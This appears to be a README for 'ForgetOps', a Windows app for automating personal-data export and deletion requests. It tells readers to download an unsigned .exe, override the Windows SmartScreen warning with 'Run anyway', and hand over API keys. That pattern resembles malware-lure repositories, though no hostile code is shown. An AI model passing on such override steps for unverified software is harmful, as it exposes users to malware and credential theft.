🛡️ ForgetOps - Manage personal data across your apps

ForgetOps helps you handle data requests for your online accounts. It automates the process of finding, exporting, and deleting personal information from various services. Use this tool to save time and meet privacy requirements like GDPR without manual work.

📥 How to download the app

  1. Visit the ForgetOps releases page.
  2. Look for the latest version at the top of the page.
  3. Find the file ending in .exe under the Assets section.
  4. Click the file name to start your download.
  5. Save the file to your computer.

⚙️ Initial setup

ForgetOps runs as a desktop application on Windows. Follow these steps to prepare your system before you start.

System requirements

Ensure your computer meets these standards:

  • Operating System: Windows 10 or Windows 11.
  • Memory: At least 4 Gigabytes of RAM.
  • Storage: 200 Megabytes of free disk space.
  • Internet Connection: Stable connection to link your cloud accounts.

Security and installation

Windows might block the app the first time you run it because it does not recognize the publisher.

  1. Double-click the downloaded .exe file.
  2. If a blue box appears saying "Windows protected your PC," click "More info."
  3. Click the "Run anyway" button.
  4. Follow the on-screen instructions to finish the installation.

🚀 Running ForgetOps

Once installed, launch the application from your Start menu or desktop icon. The main screen provides a dashboard for your data tasks.

Connecting your services

The app needs permission to talk to your SaaS platforms.

  1. Navigate to the "Accounts" tab.
  2. Select the service you wish to manage from the list.
  3. Provide your API keys or follow the sign-in prompts.
  4. The app confirms the connection with a green checkmark.

Running a deletion request

  1. Open the "Tasks" menu.
  2. Click "New Request."
  3. Choose the action type. You can select "Delete all data" or "Export data archive."
  4. Review the summary screen to verify your selections.
  5. Click "Execute" to start the process. The app logs every step so you have proof of the request.

📋 Common tasks

Data deletion

When you submit a request, ForgetOps contacts the service provider. It commands the platform to erase your records. This helps when you leave a service and want to ensure no trace of your personal info remains.

Data exports

An export task collects your data into a single file. The app formats this data for easy reading. You download the file directly to your local computer once the tool finishes the gathering process.

🛠️ Troubleshooting

If the app fails to connect to a service, check your internet settings first. Ensure your API keys remain valid and have not expired. If a specific task hangs, restart the application and retry the action. Most errors happen due to invalid login credentials.

🔐 Privacy and safety

All operations happen on your local machine. ForgetOps acts as a bridge between your computer and your cloud services. It does not store your passwords on external servers. Your credentials stay inside the app on your hard drive.

🌐 Community and support

If you run into bugs, open an issue on the GitHub repository. Provide a brief description of what happened and include the error message if one appears. This helps the developers fix issues faster. You can also review the documentation folder for advanced configuration tips.
